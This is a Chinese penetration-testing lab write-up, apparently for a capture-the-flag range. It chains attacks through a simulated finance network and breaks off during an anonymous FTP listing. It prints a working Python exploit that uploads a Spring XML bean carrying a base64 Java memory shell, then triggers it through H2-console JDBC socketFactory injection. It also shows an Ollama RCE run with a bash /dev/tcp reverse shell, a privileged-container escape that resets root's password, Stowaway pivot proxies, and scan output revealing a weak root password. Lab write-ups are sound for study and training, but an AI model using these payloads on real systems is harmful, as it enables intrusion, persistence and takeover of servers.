先打个驻留(原理搜索m4x 师傅的研究 MySQL JDBC 不出网攻击),这里一开始我是没加结尾的 --xxxxxx,因为xml加载时 </beans> 结束后必须完全没有脏字符,而不加 --xxxxxx 结尾会导致在 </beans> 后个别脏字节造成乱码,而不是EOF。导致加载失败
后来发现加上结尾的 --xxxxxx,只要加的不是 --xxxxxx--,仍然会保持驻留,并且加上了结尾会给文件顺利的写上EOF结束字节。
解法:
import socket
import time
HOST = '172.22.10.7'
PORT = 8080
if __name__ == '__main__':
payload = '''
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="decoder" class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
<property name="staticMethod" value="javax.xml.bind.DatatypeConverter.parseBase64Binary"/>
<property name="arguments">
<list>
<value>yv66vgAAADIBOwEAWW9yZy9hcGFjaGUvY29sbGVjdGlvbnMvY295b3RlL1J1bnRpbWVKc29uTWFwcGluZ0V4Y2VwdGlvbmJkZDg2N2FkM2U2ZDQ3YWI4YjNkMjE3M2U5ZTQ0YWEyBwABAQAQamF2YS9sYW5nL09iamVjdAcAAwEABjxpbml0PgEAAygpVgEAE2phdmEvbGFuZy9FeGNlcHRpb24HAAcMAAUABgoABAAJAQADcnVuDAALAAYKAAIADAEAEGdldFJlcUhlYWRlck5hbWUBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAD1gtQXV0aG9yaXphdGlvbggAEAEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgcAEgEAE2phdmEvbGFuZy9UaHJvd2FibGUHABQBABBqYXZhL2xhbmcvVGhyZWFkBwAWAQAKZ2V0VGhyZWFkcwgAGAEAD2phdmEvbGFuZy9DbGFzcwcAGgEAEltMamF2YS9sYW5nL0NsYXNzOwcAHAEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwwAHgAfCgAbACABABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QHACIBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgwAJAAlCgAjACYBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMACgAKQoAIwAqAQATW0xqYXZhL2xhbmcvVGhyZWFkOwcALAEAB2dldE5hbWUMAC4ADwoAFwAvAQAEaHR0cAgAMQEAEGphdmEvbGFuZy9TdHJpbmcHADMBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgwANQA2CgA0ADcBAAhBY2NlcHRvcggAOQEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwwAOwA8CgAEAD0BAAZ0YXJnZXQIAD8BABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7DABBAEIKABsAQwEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkBwBFCgBGACYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwASABJCgBGAEoBAAhlbmRwb2ludAgATAEABnRoaXMkMAgATgEAB2hhbmRsZXIIAFABAA1nZXRTdXBlcmNsYXNzDABSADwKABsAUwEABmdsb2JhbAgAVQEADmdldENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwwAVwBYCgAbAFkBACJvcmcuYXBhY2hlLmNveW90ZS5SZXF1ZXN0R3JvdXBJbmZvCABbAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyBwBdAQAJbG9hZENsYXNzAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwwAXwBgCgBeAGEKABsALwEACnByb2Nlc3NvcnMIAGQBABNqYXZhL3V0aWwvQXJyYXlMaXN0BwBmAQAEc2l6ZQEAAygpSQwAaABpCgBnAGoBABUoSSlMamF2YS9sYW5nL09iamVjdDsMAEgAbAoAZwBtAQADcmVxCABvAQAHZ2V0Tm90ZQgAcQEAEWphdmEvbGFuZy9JbnRlZ2VyBwBzAQAEVFlQRQEAEUxqYXZhL2xhbmcvQ2xhc3M7DAB1AHYJAHQAdwEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7DAB5AHoKAHQAewEACWdldEhlYWRlcggAfQEACWdldE1ldGhvZAwAfwAfCgAbAIAMAA4ADwoAAgCCAQALZ2V0UmVzcG9uc2UIAIQBAAlnZXRXcml0ZXIIAIYBAA5qYXZhL2lvL1dyaXRlcgcAiAEABmhhbmRsZQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7DACKAIsKAAIAjAEABXdyaXRlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWDACOAI8KAIkAkAEABWZsdXNoDACSAAYKAIkAkwEABWNsb3NlDACVAAYKAIkAlgEABGV4ZWMBAAdvcy5uYW1lCACZAQAQamF2YS9sYW5nL1N5c3RlbQcAmwEAC2dldFByb3BlcnR5DACdAIsKAJwAngEAC3RvTG93ZXJDYXNlDACgAA8KADQAoQEAA3dpbggAowEABy9iaW4vc2gIAKUBAAItYwgApwEAB2NtZC5leGUIAKkBAAIvYwgAqwEAEWphdmEvbGFuZy9SdW50aW1lBwCtAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwArwCwCgCuALEBACgoW0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DACYALMKAK4AtAEAEWphdmEvbGFuZy9Qcm9jZXNzBwC2AQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwwAuAC5CgC3ALoBABFqYXZhL3V0aWwvU2Nhbm5lcgcAvAEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgwABQC+CgC9AL8BAAJcYQgAwQEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwwAwwDECgC9AMUBAAAIAMcBAAdoYXNOZXh0AQADKClaDADJAMoKAL0AywEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyBwDNCgDOAAkBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsMANAA0QoAzgDSAQAEbmV4dAwA1AAPCgC9ANUBAAh0b1N0cmluZwwA1wAPCgDOANgBAApnZXRNZXNzYWdlDADaAA8KAAgA2wEAE1tMamF2YS9sYW5nL1N0cmluZzsHAN0BABNqYXZhL2lvL0lucHV0U3RyZWFtBwDfAQAGZXlKZVhBCADhAQAKc3RhcnRzV2l0aAEAFShMamF2YS9sYW5nL1N0cmluZzspWgwA4wDkCgA0AOUBAAZsZW5ndGgMAOcAaQoANADoAQAGY2hhckF0AQAEKEkpQwwA6gDrCgA0AOwBABUoQylMamF2YS9sYW5nL1N0cmluZzsMAHkA7goANADvAQAIcGFyc2VJbnQBABUoTGphdmEvbGFuZy9TdHJpbmc7KUkMAPEA8goAdADzAQABLggA9QEAB2luZGV4T2YMAPcA8goANAD4AQAJc3Vic3RyaW5nAQAWKElJKUxqYXZhL2xhbmcvU3RyaW5nOwwA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</value>
</list>
</property>
</bean>
<bean id="classLoader" class="javax.management.loading.MLet"/>
<bean id="clazz" factory-bean="classLoader" factory-method="defineClass">
<constructor-arg ref="decoder"/>
<constructor-arg type="int" value="0"/>
<constructor-arg type="int" value="5128"/>
</bean>
<bean factory-bean="clazz" factory-method="newInstance"/>
</beans>'''
a = b'''POST / HTTP/1.1
Host: 172.22.10.7:8080
Accept-Encoding: gzip, deflate
Accept: */*
Content-Type: multipart/form-data; boundary=xxxxxx
User-Agent: python-requests/2.32.3
Content-Length: 1296800
--xxxxxx
Content-Disposition: form-data; name="file"; filename="a.txt"
{{payload}}
--xxxxxx
'''.replace(b"\n", b"\r\n").replace(b"{{payload}}", payload.encode())
s = socket.socket()
s.connect((HOST, PORT))
s.sendall(a)
time.sleep(1111111)
写的spring的通用回显(非持久化内存马),没有spring的环境下需要重新打
POST /h2-console/login.do?jsessionid=c6642992d40cdda702b841ff6ab98bb0 HTTP/1.1
Host: 172.22.10.7:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Referer: http://172.22.10.7:8080/h2-console/login.do?jsessionid=fd406a4fd140c1aae15e2d29715a4291
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Origin: http://172.22.10.7:8080
X-Authorization: type f1111laag.txt
Content-Length: 141
language=en&setting=Generic+PostgreSQL&url={{urlenc(jdbc:postgresql:///?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=file://${catalina.home}/work/Tomcat/localhost/ROOT/*.tmp)}}
flag{9b639ea2-d4bc-4403-ac58-8ab8d50f743b}
4. Ollama 172.22.10.17 & 172.22.20.11
这里第一次扫描时只扫出来开放了 22 端口,然后做一个全端口的扫描可以发现还开放了 11434 端口,这个端口是Ollama大模型服务的默认监听端口
root@web01:/root# ./FScan_2.0.1_linux_x64 -h 172.22.10.17 -p 1-65535
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[1.8s] 已选择服务扫描模式
[1.8s] 开始信息扫描
[1.8s] 最终有效主机数量: 1
[1.8s] 开始主机扫描
[1.8s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.8s] 有效端口数量: 65535
[1.9s] [*] 端口开放 172.22.10.17:22
[2.2s] [*] 端口开放 172.22.10.17:11434
[3.7s] 扫描完成, 发现 2 个开放端口
[3.7s] 存活端口数量: 2
[3.7s] 开始漏洞扫描
访问也提示了Ollama正在运行
4.1. CVE-2024-45436 Ollama RCE
访问 /api/version 可以获取到Ollama的版本号为 0.1.46
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q curl http://172.22.10.17:11434/api/version
{"version":"0.1.46"}
网上搜索可以可以发现此版本存在一个RCE漏洞,这里还是用工具可以直接梭哈
GitHub - badboy0/Ollama_Exploit_Tool
先开启监听,然后再工具弹shell
nc -lvnp 9999 #在web01上运行
root@web01:/root# ./Ollama_Exploit_Tool
/$$$$$$ /$$ /$$ /$$$$$$ /$$ /$$ /$$$$$$
/$$__ $$| $$ | $$ /$$__ $$| $$$ /$$$ /$$__ $$
| $$ \ $$| $$ | $$ | $$ \ $$| $$$$ /$$$$| $$ \ $$
| $$ | $$| $$ | $$ | $$$$$$$$| $$ $$/$$ $$| $$$$$$$$
| $$ | $$| $$ | $$ | $$__ $$| $$ $$$| $$| $$__ $$
| $$ | $$| $$ | $$ | $$ | $$| $$\ $ | $$| $$ | $$
| $$$$$$/| $$$$$$$$| $$$$$$$$| $$ | $$| $$ \/ | $$| $$ | $$
\______/ |________/|________/|__/ |__/|__/ |__/|__/ |__/
OLLAMA EXPLOIT ————坏孩子
CVE-2024-37032 Exploit - Ollama AFR/RCE
CVE-2024-37032 & CVE-2024-45436 Exploit - Ollama RCE
EXPLOIT OPTIONS
1. Remote Code Execution (RCE)
2. Arbitrary File Read
3. Check Vulnerability
4. Exit
Select an option (0-3): 1
Enter target URL (e.g., http://localhost:11434): http://172.22.10.17:11434
Enter command to execute (e.g., 'bash -i >& /dev/tcp/IP/PORT 0>&1'): bash -i >& /dev/tcp/172.22.10.22/9999 0>&1
[*] Starting RCE exploit (CVE-2024-37032 & CVE-2024-45436)
[*] Compiling malicious shared library...
[+] Successfully compiled hook.so
[*] Creating malicious zip archive with path traversal...
[+] Successfully created evil.zip
[*] Uploading malicious blob evil.zip...
[*] Upload blob response:
[*] Creating malicious model...
[*] Create model response: {"status":"unpacking model metadata"}
{"error":"couldn't determine model format"}
[*] Triggering exploit via embeddings API...
[!] Pulling model, please wait...
[*] Pulling all-minilm:22m model...
4.2. 容器逃逸
这里查看一下当前容器的 Capabilities 的权限位,可以发现当前是一个特权容器
root@8c1b974b20d0:/# cat /proc/self/status | grep Cap
cat /proc/self/status | grep Cap
CapInh: 0000000000000000
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
特权容器就很好逃逸了,直接挂载宿主机目录逃逸
相关利用教程:Privileged 特权模式容器逃逸 | T Wiki
root@8c1b974b20d0:/# mkdir -p /mnt/host
root@8c1b974b20d0:/# mount /dev/vda3 /mnt/host
root@8c1b974b20d0:/mnt/host# chroot /mnt/host
# passwd 直接修改root密码
然后就可以用你修改好的密码ssh登录到这台机器了(需要内网代理)
4.3. 内网代理(第二层)
查看网卡信息发现当前机器有 20网段的网卡
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:10:25:bf brd ff:ff:ff:ff:ff:ff
inet 172.22.10.17/24 metric 100 brd 172.22.10.255 scope global dynamic eth0
valid_lft 1892154743sec preferred_lft 1892154743sec
inet6 fe80::216:3eff:fe10:25bf/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:54:d2:8f:c2 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:54ff:fed2:8fc2/64 scope link
valid_lft forever preferred_lft forever
5: vethd8b41cb@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 72:16:f3:ff:62:21 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::7016:f3ff:feff:6221/64 scope link
valid_lft forever preferred_lft forever
6: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:10:25:e7 brd ff:ff:ff:ff:ff:ff
inet 172.22.20.11/24 metric 100 brd 172.22.20.255 scope global dynamic eth1
valid_lft 1892154849sec preferred_lft 1892154849sec
inet6 fe80::216:3eff:fe10:25e7/64 scope link
valid_lft forever preferred_lft forever
上传stowaway agent端,搭建双层代理
首先在你的vps端执行下面的操作
(node 0) >> listen
[*] BE AWARE! If you choose IPTables Reuse or SOReuse,you MUST CONFIRM that the node you're controlling was started in the corresponding way!
[*] When you choose IPTables Reuse or SOReuse, the node will use the initial config(when node started) to reuse port!
[*] Please choose the mode(1.Normal passive/2.IPTables Reuse/3.SOReuse): 1
[*] Please input the [ip:]<port> : 9898
[*] Waiting for response......
[*] Node is listening on 9898
(node 0) >>
然后在Ollama上执行下面的命令连接
root@Ollama:~# ./linux_x64_agent -c 172.22.10.22:9898
2025/11/08 21:43:47 [*] Starting agent node actively.Connecting to 172.22.10.22:9998
连接好后,回到你的admin端(vps上) 进行下面的操作
[*] Node is listening on 9898
(node 0) >>
[*] New node online! Node id is 1
(node 0) >> back
(admin) >> use 1
(node 1) >> socks 7777
[*] Trying to listen on 0.0.0.0:7777......
[*] Waiting for agent's response......
[*] Socks start successfully!
这样你双层代理就搭好了,把之前 proxychains 和 proxyfier 的代理配置端口改成你设置的新端口,即可同时访问到 内网的10 和20网段
4.4. 内网扫描x2
上传Fscan到Ollama这台机器上,扫描一下20网段
root@Ollama:~# ./FScan_2.0.1_linux_x64 -h 172.22.20.11/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[1.9s] 已选择服务扫描模式
[1.9s] 开始信息扫描
[1.9s] CIDR范围: 172.22.20.0-172.22.20.255
[1.9s] generate_ip_range_full
[1.9s] 解析CIDR 172.22.20.11/24 -> IP范围 172.22.20.0-172.22.20.255
[1.9s] 最终有效主机数量: 256
[1.9s] 开始主机扫描
[1.9s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.9s] [*] 目标 172.22.20.11 存活 (ICMP)
[1.9s] [*] 目标 172.22.20.165 存活 (ICMP)
[1.9s] [*] 目标 172.22.20.25 存活 (ICMP)
[1.9s] [*] 目标 172.22.20.253 存活 (ICMP)
[1.9s] [*] 目标 172.22.20.32 存活 (ICMP)
[1.9s] [*] 目标 172.22.20.38 存活 (ICMP)
[4.9s] 存活主机数量: 6
[4.9s] 有效端口数量: 233
[5.0s] [*] 端口开放 172.22.20.25:88
[5.0s] [*] 端口开放 172.22.20.25:139
[5.0s] [*] 端口开放 172.22.20.25:135
[5.0s] [*] 端口开放 172.22.20.11:22
[5.0s] [*] 端口开放 172.22.20.25:445
[5.0s] [*] 端口开放 172.22.20.25:389
[5.0s] [*] 端口开放 172.22.20.165:139
[5.0s] [*] 端口开放 172.22.20.165:445
[5.0s] [*] 端口开放 172.22.20.165:135
[5.0s] [*] 端口开放 172.22.20.32:445
[5.0s] [*] 端口开放 172.22.20.32:139
[5.0s] [*] 端口开放 172.22.20.32:135
[5.0s] [*] 端口开放 172.22.20.38:445
[5.0s] [*] 端口开放 172.22.20.38:139
[5.0s] [*] 端口开放 172.22.20.38:135
[5.0s] [*] 端口开放 172.22.20.38:80
[5.0s] [*] 端口开放 172.22.20.38:21
[5.0s] [*] 端口开放 172.22.20.38:8172
[5.0s] [*] 端口开放 172.22.20.38:8080
[8.0s] 扫描完成, 发现 19 个开放端口
[8.0s] 存活端口数量: 19
[8.0s] 开始漏洞扫描
[8.0s] [*] 网站标题 http://172.22.20.38 状态码:404 长度:315 标题:Not Found
[8.0s] [*] NetInfo 扫描结果
目标主机: 172.22.20.165
主机名: FPSRVIIS03-2
发现的网络接口:
IPv4地址:
└─ 172.22.20.165
[8.0s] [*] NetInfo 扫描结果
目标主机: 172.22.20.25
主机名: FPSRVAD01
发现的网络接口:
IPv4地址:
└─ 172.22.20.25
[8.1s] [*] NetInfo 扫描结果
目标主机: 172.22.20.32
主机名: FPSRVFS02
发现的网络接口:
IPv4地址:
└─ 172.22.20.32
[8.1s] [*] NetInfo 扫描结果
目标主机: 172.22.20.38
主机名: FPSRVIIS03
发现的网络接口:
IPv4地址:
└─ 172.22.20.38
[8.1s] [+] NetBios 172.22.20.38 FPCORP\FPSRVIIS03
[8.1s] [+] NetBios 172.22.20.32 FPCORP\FPSRVFS02
[8.1s] [+] NetBios 172.22.20.25 DC:FPCORP\FPSRVAD01
[8.1s] [+] NetBios 172.22.20.165 FPCORP\FPSRVIIS03-2
[8.1s] POC加载完成: 总共387个,成功387个,失败0个
[8.2s] [+] FTP服务 172.22.20.38:21 匿名登录成功!
[8.7s] [+] SSH密码认证成功 172.22.20.11:22 User:root Pass:123123
[9.7s] [*] 网站标题 http://172.22.20.38:8080 状态码:200 长度:5078 标题:IntraFetch
[10.1s] [*] 网站标题 https://172.22.20.38:8172 状态码:404 长度:0 标题:无标题
[52.4s] 扫描已完成: 35/35
整理一下
FPSRVAD01: 172.22.20.25 域控
FPITWKS101: 172.22.20.165
FPSRVFS02: 172.22.20.32
FPSRVIIS03: 172.22.20.38 FTP匿名登录 IIS服务器
Ollama: 172.22.20.11 已经拿下
5. FPSRVIIS03 172.22.20.38 IIS服务器
这里一眼下一步目标肯定是 172.22.20.38 这台机器
首先先配置一下 /etc/hosts 和 /etc/krb5.conf
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance/ftp]
└─# proxychains -q nxc smb 172.22.20.25 -u guest -p '' --generate-hosts-file hosts
SMB 172.22.20.25 445 FPSRVAD01 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVAD01) (domain:fpcorp.int) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.20.25 445 FPSRVAD01 [-] fpcorp.int\guest: STATUS_ACCOUNT_DISABLED
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance/ftp]
└─# cat hosts
172.22.20.25 FPSRVAD01.fpcorp.int fpcorp.int FPSRVAD01
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# echo hosts >> /etc/hosts
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc smb 172.22.20.25 -u guest -p '' --generate-krb5-file /etc/krb5.conf
SMB 172.22.20.25 445 FPSRVAD01 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVAD01) (domain:fpcorp.int) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.20.25 445 FPSRVAD01 [+] krb5 conf saved to: /etc/krb5.conf
SMB 172.22.20.25 445 FPSRVAD01 [+] Run the following command to use the conf file: export KRB5_CONFIG=/etc/krb5.conf
SMB 172.22.20.25 445 FPSRVAD01 [-] fpcorp.int\guest: STATUS_ACCOUNT_DISABLED
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# cat /etc/krb5.conf
[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = FPCORP.INT
[realms]
FPCORP.INT = {
kdc = fpsrvad01.fpcorp.int
admin_server = fpsrvad01.fpcorp.int
default_domain = fpcorp.int
}
[domain_realm]
.fpcorp.int = FPCORP.INT
fpcorp.int = FPCORP.INT
5.1. web 8080 内网软件资源中心网站
这是一个叫 IntraFetch 的内网软件资源中心网站
提供了一些文件下载服务
使用的是IIS服务器+ ASP.NET框架
5.2. FTP 匿名登录
利用 anonymous 用户匿名登录到目标FTP服务器
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q ftp 172.22.20.38
Connected to 172.22.20.38.
220 Microsoft FTP Service
Name (172.22.20.38:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> bin
200 Type set to I.
ftp> ls
229 Entering Extended Passive Mode (|||49771|)
125 Data connection already open; Transfer starting.
